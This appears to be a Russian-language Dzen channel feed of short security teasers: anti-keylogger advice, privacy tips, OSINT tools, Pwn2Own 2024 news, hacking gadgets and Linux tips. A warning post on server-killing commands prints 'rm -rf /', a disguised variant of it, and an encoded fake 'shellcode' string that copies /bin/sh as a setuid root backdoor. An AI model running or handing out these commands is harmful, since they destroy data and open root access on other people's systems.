Найти в Дзене
Защита паролей от кейлоггеров
Для надежной защиты ваших паролей от кейлоггеров — вредоносных программ, регистрирующих каждое нажатие клавиш — советую использовать Zemana AntiLogger. 👉 Zemana AntiLogger эффективно защищает вашу информацию, используя передовые технологии обнаружения, которые могут распознавать как известные, так и новые, ещё не идентифицированные угрозы...
1 год назад
4 способа очистить свой цифровой след
✔️ Удаление старых аккаунтов и подписок Пересмотрите все свои старые аккаунты в социальных сетях, форумах и других сервисах. Если они вам больше не нужны, лучше их удалить. Также отпишитесь от ненужных рассылок. ✔️Очистка истории браузера и кук Регулярно очищайте историю браузера и куки. Многие браузеры позволяют настроить автоматическую очистку данных при закрытии. ✔️ Использование инструментов для управления цифровым следом Воспользуйтесь сервисами вроде Deseat...
1 год назад
ЦИФРОВОЙ ОТПЕЧАТОК ПАЛЬЦА
Для начала нужно понять, что файлы cookie и цифровой отпечаток пальца это не одно и то же. Куки хранятся на устройстве пользователя, а отпечаток хранится в базе данных сервера ▪️Что из себя представляет цифровой отпечаток? Создает он при помощи сбора различной информации с устройств и браузеров пользователей. Извлеченная информация включает в себя: IP-адреc, HTTP-заголовок, часовой пояс, плагин браузера, объекты JavaScript, MAC-адрес, шрифты, User-Agent браузера, Flash, информация CSS и вся информация об устройстве, такая как ОС, языки, разрешение экрана и так далее. ▪️Как можно скрыть свой цифровой отпечаток? Вариант 1 — шифрование...
1 год назад
5 полезных инструментов для онлайн-расследования
Если вас интересуют чьи-то данные, но вы не можете их найти — значит у вас устаревшие инструменты. Вот лучшие расширения и сервисы, которые еще работают Double Shot Search (https://chrome.google.com/webstore/detail/double-shot-search-query/kddlkbpbepnaepdleclhdnfdpdogdhop) — расширение для Chrome, которое улучшает поиск в два раза. Поиск выполняется одновременно в двух поисковых системах — в Bing и Google. Результаты показываются рядом друг с другом. Hunter.io (https://hunter.io/) — сервис, который найдёт адрес электронной почты, связанный с определённым доменом. Вбейте нужный домен и вы узнаете все почты с такими же названиями...
1 год назад
Аналоги и чем заменить MikroTik RouterOS?
Основным продуктом MikroTik является операционная система на базе Linux, известная как MikroTik RouterOS. Устанавливается на персональный компьютер или сервер, он превращает компьютер в сетевой маршрутизатор, реализуя такие функции, как правила брандмауэра, сервер и клиент виртуальной частной сети (VPN), формирование полосы пропускания и качество обслуживания, функции точки беспроводного доступа и другие широко используемые функции для маршрутизации и соединения сетей. Операционная система лицензируется при повышении уровня обслуживания, каждый из которых освобождает больше доступных функций RouterOS...
246 читали · 1 год назад
В первый день Pwn2Own 2024 взломали Windows 11, Tesla и Ubuntu Linux В первый день соревнования Pwn2Own 2024 для хакеров, походящего в Ванкувере, специалисты успели продемонстрировать эксплуатацию уязвимостей нулевого дня (0-day) в Windows 11, Tesla и Ubuntu Linux. Ивент начался с того, что специалист Haboob SA Абдул Азиз Харири задействовал эксплойт для уязвимости в Adobe Reader, с помощью которого можно обойти ограничения API и выполнить код в macOS. За демонстрацию вектора атаки Азиз Харири получил 50 тысяч долларов от организаторов. Затем компания Synacktiv выиграла Tesla Model 3 и 200 тысяч долларов за взлом электронного блока управления автомобилем. С помощью целочисленного переполнения специалисты справились с задачей менее чем за 30 секунд. После этого настал черёд VMware Workstation VM , которой занялись эксперты компании Theori Гвангун Юнг и Джуно Ли. Они заработали 130 тысяч долларов за выполнение кода с правами SYSTEM в Windows с помощью переполнения буфера, бреши в UAF и бага неинициализированной переменной. Исследователи из Reverse Tactics принесли компании $90 тысяч за эксплуатацию двух уязвимостей в Oracle VirtualBox, позволяющих выйти за пределы виртуальной машины и повысить права до SYSTEM. В конце первого дня Pwn2Own Vancouver 2024 Манфред Пол продемонстрировал атаку на браузеры Apple Safari, Google Chrome и Microsoft Edge. Эксплуатация трёх 0-day помогла специалисту заработать 102 500 долларов.
1 год назад
Лучшие гаджеты для взлома и их применение
Flipper Zero Это игрушечный портативный инструмент для взлома. Устройство способно считывать, копировать и эмулировать метки RFID и NFC, радиопульты, кнопки iButton и цифровые ключи доступа, а также интерфейс GPIO. Raspberry Pi Это недорогой настольный компьютер размером с кредитную карту, работающий под управлением Linux, но также оснащенный набором выводов GPIO (ввод/вывод общего назначения). Он позволяет людям изучать компьютерные технологии и учиться программированию. Dstike Wi-Fi Duether Может выкидывать устройства из сети, подключены вы к ней или нет...
1 год назад
Linux: подборка ОС для личной кибербезопасности
Многие из вас в поисках дистрибутива для хакинга и пентеста, в этой статье кратко расскажу о операционных системах незаменимых для компьютерной криминалистики и тестирования на проникновение. 1. Parrot Security Edition: базируется на Debian и близок к Kali Linux, но предлагает больше предустановленного ПО для «мирного» повседневного использования. Хотя, внутри хватает и специализированных утилит: в состав дистрибутива включено больше 600 инструментов для Red и Blue Teaming. parrotsec.org 2. Tsurugi...
1 год назад
Изменение даты на 1 декабря 10 000 года вывело Windows 11 из строя
Энтузиаст Love Comparison изменил дату в системном времени Windows 11 на 1 января 10 000 года. Штатными средствами это сделать не удавалось, поэтому тестировщик использовал специализированную команду и отредактировал файл запуска ОС. Так ему удалось установить дату на 31 декабря 9999 года (23:59). Через минуту год изменился на 10000-й. После этого системные часы остановились, а винда засбоила...
1 год назад
10 команд Linux убивающие сервер
Опасные, необратимые ▪ rm –rf / - Удаляет всё, до чего только может добраться. Существует несколько вариаций для маскировки этой команды: mkdir test cd test touch ./-r touch ./-f su rm * / char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68” “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99” “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7” “x56x04xf7x56x08xf7x56x0cx83xc4x74x56” “x8dx73x08x56x53x54x59xb0x0bxcdx80x31” “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69” “x6ex2fx73x68x00x2dx63x00” “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; (16-ричное представление...
1 год назад
LM Studio — Нейросети в каждый дом
LM Studio представляет собой инструмент, который обеспечивает работу с различными моделями искусственного интеллекта. У данного инструмента имеется удобный интерфейс с функцией поиска по Language Model (LLM). В LM Studio вы сможете обнаружить популярные opensource-модели, такие как LLaMa или Mistral. Основные функциональности LM Studio включают: Создание чат-ботов: LM Studio предоставляет разнообразные шаблоны и инструменты для создания чат-ботов как с нуля, так и на основе существующих моделей...
424 читали · 1 год назад
Команда find и опции - exec /Linux совет
Вы можете использовать опцию -exec команды find, чтобы вызвать внешнюю программу для выполнения определенного действия над файлами, которые соответствуют определенным критериям. Например, удаление файлов, список разрешений на файлы и т. д. $ find ~/ -type f -exec ls -lah {} \; Это очень удобно при выполнении одного и того же действия над несколькими файлами в разных местах. Приведенная выше команда является примером вывода списка разрешений и других метаданных каждого файла, найденного командой find...
1 год назад